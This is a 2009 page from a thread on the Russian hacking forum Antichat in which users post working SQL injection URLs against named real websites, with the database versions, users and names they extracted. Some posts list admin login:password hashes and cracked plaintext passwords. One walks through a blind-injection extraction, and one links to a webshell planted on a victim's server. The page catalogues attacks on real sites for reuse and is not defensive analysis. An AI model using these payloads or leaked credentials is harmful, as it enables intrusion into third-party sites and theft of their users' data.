ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7951  
Старый 21.02.2009, 22:33
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://dr-gng.dp.ua/index.php?act=publ&id=-10+UNION+SELECT+1,version(),3,4,5
5.0.67-community

Код:
http://perfumes4you.kiev.ua/index.php?act=publ&id=-19+UNION+SELECT+version(),2,3,4,5,6
5.0.67-community

Код:
http://www.med-tech.kiev.ua/index.php?act=publ&id=-12+UNION+SELECT+version(),2,3,4,5
5.0.67-community

Код:
http://forex-4-all.ru/index.php?act=publ&id=-2+UNION+SELECT+version(),2,3,4,5
4.1.22-standard

Последний раз редактировалось jokester; 21.02.2009 в 22:40.. Причина: all-perfumes.com.ua боян
 
Ответить с цитированием

  #7952  
Старый 21.02.2009, 22:52
Аватар для Kraneg
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

steamwhistle.ca - PR6
Код:
http://www.steamwhistle.ca/events/eventdetail.php?EventID=-146+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14/*
DB_ver: 5.0.24a-log
DB_User: u70604077@cgihost
DB: d60541981
 
Ответить с цитированием

  #7953  
Старый 21.02.2009, 23:04
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://russia-forex.ru/index.php?act=publ&id=-2+UNION+SELECT+version(),2,3,4,5&page=
4.1.22-standard
 
Ответить с цитированием

  #7954  
Старый 21.02.2009, 23:32
Аватар для [JavaScript]
[JavaScript]
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296

Репутация: 74
По умолчанию

Похоронный портал - funeralportal.ru - PR 4
Код:
http://www.funeralportal.ru/catalog.php?SubjectId=445+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
user:database:version
u58626@10.10.223.217:u58626:5.0.67-log
 
Ответить с цитированием

  #7955  
Старый 21.02.2009, 23:35
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

PageRank: 5 www.tina-b.com
PHP код:
http://www.tina-b.com/content.php?season=2007&A9=en&akce=section&id=-2123+union+select+1,2,3,4,concat_ws(0x3A,@@version,user(),database()),6,7,8,9,10,11,12+--+ 
PageRank: 5 www.salon.eu.sk
PHP код:
http://www.salon.eu.sk/author.php?author=-68'+union+select+1,concat_ws(0x3A,@@version,user(),database()),3+--+ 
 
Ответить с цитированием

  #7956  
Старый 21.02.2009, 23:45
Аватар для [JavaScript]
[JavaScript]
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296

Репутация: 74
По умолчанию

crystallakenet.org - PR 4
Код:
http://www.crystallakenet.org/subject.php?subjectID=-62+union+select+concat_ws(0x3a,user(),database(),version())
user:database:version
library2_ciab@localhost:library2_ciab:4.1.22-standard


sA21
Цитата:
Yvajaemee Guru
Я не гуру, но все же помогу.
Цитата:
4133e372138889e4ef3cb1ac01cb85ed
пароль - rotideez.
Цитата:
chem polzevatsa
https://hashcracking.info/index.php
Цитата:
ishto eto za yazek
http://ru.wikipedia.org/wiki/md5

Последний раз редактировалось [JavaScript]; 21.02.2009 в 23:59..
 
Ответить с цитированием

  #7957  
Старый 22.02.2009, 01:52
Аватар для b3
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

wac.org.ua/wacindex.php?id=-5+UNION+SELECT+1,2,3
4.1.22-standard-log
wac_a:s8bl656
=
http://travel.org.ua/water/index.php?id=-5+UNION+SELECT+1,2,file_priv,4,5+from+mysql.user/*
N =(
travel.org.ua/water/index.php?id=-5+UNION+SELECT+1,2,3,4,5
5.0.22
1000 ТИЦ
=
kievrealtor.org.ua/news.php?id=-5+UNION+SELECT+1,2,3,4
http://kievrealtor.org.ua/news.php?id=-5+UNION+SELECT+1,2,3,4+from+owner
4.1.22-standard
=
okno-v-mir.org.ua/oknoindex.php?id=-5+UNION+SELECT+1,2,3
http://okno-v-mir.org.ua/oknoindex.php?id=-5+UNION+SELECT+1,2,concat(login,0x3a,password)+fro m+users
http://okno-v-mir.org.ua/admin/admin.php
ovm_a:s8bl656
4.1.22-standard-log
=
www.frankivsk-fm.org.ua/new.php?id=-5+UNION+SELECT+1,2,3,4,5,6,7,8

Последний раз редактировалось jokester; 22.02.2009 в 02:03.. Причина: шнллы запрешены в паблике, fin.org.ua www.yalta.org.ua БОЯНы
 
Ответить с цитированием

Blind
  #7958  
Старый 22.02.2009, 02:27
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию Blind

http://www.lutek.ro/car.php?codp=1056 AND ASCII(SUBSTRING((select version())1,1))=x


x=53,46,48,46,54,55,45,99,111,109,109,117,110,105, 116,121

http://www.lutek.ro/car.php?codp=1056 AND ASCII(SUBSTRING((select database())1,1))=x

x=108,117,117,116,101,107,95,103,101,57,50,108,114




http://www.lutek.ro/car.php?codp=1056 AND ASCII(SUBSTRING((select user()),1,1))=x

x=108,117,117,116,101,107,95,117,115,101,114,64,10 8,111,99,97,108,104,111,115,116


Version : 5.0.67-community
Database : luutek_ge92lr
User : luutek_user@localhost

Последний раз редактировалось Gorev; 22.02.2009 в 02:31..
 
Ответить с цитированием

  #7959  
Старый 22.02.2009, 02:37
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Page Rank 5 www.bioenergetic.hu
Какой то вебшоп самопальный
PHP код:
http://www.bioenergetic.hu/index.php?module=webshop&target=view&id=93+union+select+1,concat_ws(0x3A,name,password),3,4+from+bioenergetic.tps_user+limit+0,1+--+ 
admin:217a968c3f6a1d9d9cf8784d1c83ca43 - admin:tibor

админка какая то стремная но шелл наверно можно подлить:

http://www.bioenergetic.hu/admin.php

PR -6 www.streetchildren.org.uk, я как database() увидел аш крякнул .
PHP код:
http://www.streetchildren.org.uk/resources/details/?type=theme&Reg%3Cbr%20/%3Eion=&country=&key_theme=&theme=-125+union+select+1,2,concat_ws(0x3A,user,password,host,file_priv),4,5,6,7,8+from+mysql.user+--+&other=&publication= 

Последний раз редактировалось AkyHa_MaTaTa; 22.02.2009 в 03:19..
 
Ответить с цитированием

  #7960  
Старый 22.02.2009, 03:06
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

2 AkyHa_MaTaTa

http://www.bioenergetic.hu/images/webshop/ezoterikus_termekek_ekszerek_egyeb/webshell.php

http://www.valera.ro/catalog.php?pid=-40+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8



Database Version: 5.0.32-Debian_7etch8-log
Database name: valera
User name: valera@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ